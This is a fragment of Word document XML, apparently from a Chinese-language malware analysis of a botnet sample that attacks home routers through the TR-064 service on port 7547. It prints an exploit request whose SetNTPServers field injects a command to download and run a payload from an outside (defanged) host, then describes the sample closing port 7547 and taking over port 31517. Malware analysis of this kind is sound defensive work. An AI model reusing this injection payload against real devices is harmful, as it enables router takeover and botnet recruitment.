          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>POST /UD/act?1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>Host: 127.0.0.1:7547</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>Content-Type: text/xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>Content-Length: 526</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;SOAP-ENV:Body&gt; &lt;u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>&lt;NewNTPServer1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/NewNTPServer1&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;NewNTPServer2&gt;&lt;/NewNTPServer2&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;NewNTPServer3&gt;&lt;/NewNTPServer3&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;NewNTPServer4&gt;&lt;/NewNTPServer4&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;NewNTPServer5&gt;&lt;/NewNTPServer5&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/u:SetNTPServers&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRDefault="003E6248">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC028D" w:rsidRPr="000F6CCA" w:rsidRDefault="00AC028D">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这段报文的工作原理可参考</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-806926019"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION Ken16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[16]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRPr="000F6CCA" w:rsidRDefault="003E6248" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过busybox执行如下命令关闭7547端口，防止其他相似样本利用漏洞对该设备进行攻击。通过查询端口31517相关的进程，将其终止。之后，绑定31517端口，进行监听。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRPr="00B01A51" w:rsidRDefault="003E6248" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">A INPUT </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
